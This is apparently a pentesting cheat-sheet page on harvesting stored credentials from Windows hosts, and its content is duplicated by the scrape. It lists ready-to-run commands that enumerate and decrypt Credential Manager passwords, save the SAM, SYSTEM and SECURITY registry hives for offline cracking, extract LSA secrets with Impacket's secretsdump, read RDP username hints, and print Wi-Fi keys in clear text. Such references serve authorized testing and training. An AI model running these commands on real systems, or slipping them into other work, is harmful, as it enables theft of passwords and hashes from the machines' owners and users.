Stored Credentials

Commands

cmdkey /list

Lists credentials stored in Windows Credential Manager.

Get-StoredCredential

Lists credentials stored in Windows Credential Manager.

Get-StoredCredential -Target "TargetName"

Lists credentials for a specific target in Windows Credential Manager.

$cred = Get-StoredCredential -Target "TargetName"

Retrieves credentials for a specific target from Windows Credential Manager.

$cred.GetNetworkCredential().Password

Retrieves and decrypts the password for a specific target from Windows Credential Manager.

wmic path Win32_VaultCredential

Lists credentials stored in Windows Vault using WMI (may not work on all systems).

reg.exe save hklm\sam C:\temp\sam.save

Copies SAM. The SAM can be decrypted using secretsdump.py from Impacket.

reg.exe save hklm\system C:\temp\system.save

Copies System Registry.

Lists credentials stored in Windows Vault using CIM-Instance (may not work on all systems):

Get-CimInstance -Namespace "Root\Microsoft\Windows\Security\*" -ClassName Win32_VaultCredential

Lists usernames used for Remote Desktop connections from the registry using PowerShell:

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Terminal Server Client\Default"

Decrypts and retrieves the username for a specific RDP server from the registry using PowerShell:

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Terminal Server Client\Servers\ServerName" -Name "UsernameHint"

Lists Wi-Fi network profiles and their passwords using PowerShell (requires admin privileges):

(netsh wlan show profiles) | ForEach-Object { $_; (netsh wlan show profile name="$($_.Trim())" key=clear) }

LSA Secrets

LSA Secrets is used by the Local Security Authority (LSA) as storage, and oftentimes information such as auto-login service accounts or VPN credentials may be stored here:

To extract LSA secrets you need SYSTEM privs:

reg.exe save hklm\security C:\temp\security.save

reg.exe save hklm\system C:\temp\system.save

LSA Secrets is stored within the Security Registry.

We still need the Syskey from the System hive so we can decrypt the contents of LSA Secrets.

We can then extract the LSA Secrets using secretsdump from Impacket with the command:

python3 secretsdump.py -security security.save -system system.save LOCAL

Copy SAM and System Hive

To backup the SAM and SYSTEM hashes, we can use the following commands:

reg save hklm\system C:\Users\backup\system.hive

reg save hklm\sam C:\Users\backup\sam.hive

PreviousRegistry Locations NextRemote Command Execution

Last updated 1 year ago

Was this helpful?

Commands

cmdkey /list

Lists credentials stored in Windows Credential Manager.

Get-StoredCredential

Lists credentials stored in Windows Credential Manager.

Get-StoredCredential -Target "TargetName"

Lists credentials for a specific target in Windows Credential Manager.

$cred = Get-StoredCredential -Target "TargetName"

Retrieves credentials for a specific target from Windows Credential Manager.

$cred.GetNetworkCredential().Password

Retrieves and decrypts the password for a specific target from Windows Credential Manager.

wmic path Win32_VaultCredential

Lists credentials stored in Windows Vault using WMI (may not work on all systems).

reg.exe save hklm\sam C:\temp\sam.save

Copies SAM. The SAM can be decrypted using secretsdump.py from Impacket.

reg.exe save hklm\system C:\temp\system.save

Copies System Registry.

Lists credentials stored in Windows Vault using CIM-Instance (may not work on all systems):

Get-CimInstance -Namespace "Root\Microsoft\Windows\Security\*" -ClassName Win32_VaultCredential

Lists usernames used for Remote Desktop connections from the registry using PowerShell:

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Terminal Server Client\Default"

Decrypts and retrieves the username for a specific RDP server from the registry using PowerShell:

Get-ItemProperty -Path "HKCU:\Software\Microsoft\Terminal Server Client\Servers\ServerName" -Name "UsernameHint"

Lists Wi-Fi network profiles and their passwords using PowerShell (requires admin privileges):

(netsh wlan show profiles) | ForEach-Object { $_; (netsh wlan show profile name="$($_.Trim())" key=clear) }

LSA Secrets

LSA Secrets is used by the Local Security Authority (LSA) as storage, and oftentimes information such as auto-login service accounts or VPN credentials may be stored here:

To extract LSA secrets you need SYSTEM privs:

reg.exe save hklm\security C:\temp\security.save

reg.exe save hklm\system C:\temp\system.save

LSA Secrets is stored within the Security Registry.

We still need the Syskey from the System hive so we can decrypt the contents of LSA Secrets.

We can then extract the LSA Secrets using secretsdump from Impacket with the command:

python3 secretsdump.py -security security.save -system system.save LOCAL